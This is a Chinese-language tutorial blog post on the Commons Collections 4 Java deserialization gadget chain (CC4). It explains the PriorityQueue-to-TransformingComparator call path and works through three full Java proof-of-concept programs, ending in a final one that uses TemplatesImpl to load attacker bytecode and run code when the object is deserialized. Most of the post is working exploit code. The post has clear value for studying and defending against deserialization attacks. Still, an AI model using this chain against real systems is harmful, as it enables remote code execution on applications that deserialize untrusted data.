CC链学习-cc4

前言

学习完cc1,6,3了，组长的视频也是快结束了，继续来捋一捋cc4

cc4其实和前面的几个挺相似的，也不过就是某个类的调用有点区别。

分析

cc4是在ommons-collections4<基础上的，需要先导入一下

<dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-collections4</artifactId>
            <version>4.0</version>
        </dependency>

组长从ChainedTransformer入手（这里可以把3.2.1的包删一下，看的我眼花聊乱的是4.0的ChainedTransformer）

查找transformer的用法,在TransformingComparator中

往回找看看谁调用了compare这里就比较难找了，需要有一些开发基础，这里往回找找优先队列PriorityQueue

可以看到这里调用了compare的方法，这里是私有的，一会需要反射调用

向上找

最后到了readObject

刚刚好一路顺下来了，

PriorityQueue#readObject —> PriorityQueue#heapify() —>  PriorityQueue#siftDownUsingComparator()  —>TransformingComparator.compare()

控制PriorityQueue.siftDownUsingComparator的comparator的值为TransformingComparator,触发TransformingComparator的Transform方法，在走到cc3后半段

那为啥cc3不能用TransformingComparator，cc4能了呢

cc4这里的TransformingComparator继承了序列化接口，但cc3的却没有

cc4需要用到TransformingComparator和PriorityQueue，先来看一下怎么调用

穿进去的Transformer直接就会得到transformer

直接利用就好

TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>());

这个也是一样啊，new一下传参数就OK

PriorityQueue priorityQueue= new PriorityQueue<>(transformingComparator);

在拼接上cc3

初步poc

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.*;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;


public class cc4 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates=new TemplatesImpl();
        Class tc=templates.getClass();
        Field nameFiled=tc.getDeclaredField("_name");
        nameFiled.setAccessible(true);
        nameFiled.set(templates,"aaaa");
        Field bytecodesField=tc.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[]code= Files.readAllBytes(Paths.get("F:\\CTF\\Java\\RECC\\target\\classes\\Test.class"));

        byte[][]codes={code};
        bytecodesField.set(templates,codes);
        Field tfactoryField=tc.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates,new TransformerFactoryImpl());

//        templates.newTransformer();

        InstantiateTransformer instantiateTransformer= new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
//        instantiateTransformer.transform(TrAXFilter.class);
        Transformer[] transformers;
        transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
//        chainedTransformer.transform(1);
        TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
        PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);


        serialize(priorityQueue);
        unserialize("ser.bin");

    }
    public static void serialize(Object object) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(object);
    }

    //反序列化方法
    public static void unserialize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();
    }
}

执行完无事发生，下个断点看看

到这里发现size等于0

size等于0，右移1>>>0会变成0，i就是-1，不满足i>=0，也就不会执行siftDown,也不会到siftDownUsingComparator，

后面也就更不会执行，无事发生

所以我们要改掉size的大小（大于等于2就行），Size 就是 PriorityQueue 这个队列的长度，所以咱们尝试往队列中添加两个值

priorityQueue.add(1);  
priorityQueue.add(2);

加上但是又报错了

cc链的老毛病，可以在对象创建时传入一些无关紧要的初始数据，并在后续操作中通过反射或者其他手段来修改这些数据

public boolean add(E e) {
    return offer(e);
}

public boolean offer(E e) {
    ......
    else
        siftUp(i, e);
    return true;
}

private void siftUp(int k, E x) {
    if (comparator != null)
        siftUpUsingComparator(k, x);
    else
        siftUpComparable(k, x);
}

private void siftUpUsingComparator(int k, E x) {
    while (k > 0) {
        int parent = (k - 1) >>> 1;
        Object e = queue[parent];
        if (comparator.compare(x, (E) e) >= 0)
            break;
        queue[k] = e;
        k = parent;
    }
    queue[k] = x;
}

将反射改为add方法后，也可以成功弹出计算器（但是这样在本地序列化也会弹计算器）

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.*;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;


public class cc4 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates=new TemplatesImpl();
        Class tc=templates.getClass();
        Field nameFiled=tc.getDeclaredField("_name");
        nameFiled.setAccessible(true);
        nameFiled.set(templates,"aaaa");
        Field bytecodesField=tc.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[]code= Files.readAllBytes(Paths.get("F:\\CTF\\Java\\RECC\\target\\classes\\Test.class"));

        byte[][]codes={code};
        bytecodesField.set(templates,codes);
        Field tfactoryField=tc.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates,new TransformerFactoryImpl());

//        templates.newTransformer();

        InstantiateTransformer instantiateTransformer= new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
//        instantiateTransformer.transform(TrAXFilter.class);
        Transformer[] transformers;
        transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
//        chainedTransformer.transform(1);
        TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
        PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);

        serialize(priorityQueue);
//        unserialize("ser.bin");

    }
    public static void serialize(Object object) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(object);
    }

    //反序列化方法
    public static void unserialize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();
    }
}

也可以利用前面那个老毛病，先让他反序列化传入无用数据，序列化后再改过来

最终poc

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class cc4 {

    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class tc = templates.getClass();
        Field nameField = tc.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"aaa");
        Field bytecodeField = tc.getDeclaredField("_bytecodes");
        bytecodeField.setAccessible(true);

        byte[] code = Files.readAllBytes(Paths.get("F:\\CTF\\Java\\RECC\\target\\classes\\Test.class"));
        byte codes[][]= {code};
        bytecodeField.set(templates,codes);

        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer


        };
        //chainedTransformer.transform(1);
        ChainedTransformer chainedTransformer = new ChainedTransformer<>(transformers);
        //TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue= new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);

        Class c = transformingComparator.getClass();
        Field transformerField = c.getDeclaredField("transformer");
        transformerField.setAccessible(true);
        transformerField.set(transformingComparator,chainedTransformer);

        serialize(priorityQueue);
        unserialize("ser.bin");



    }
    public  static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
        /*
        写对象，序列化
         */
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        /*
        读对象，反序列化
         */
        return obj;
    }

}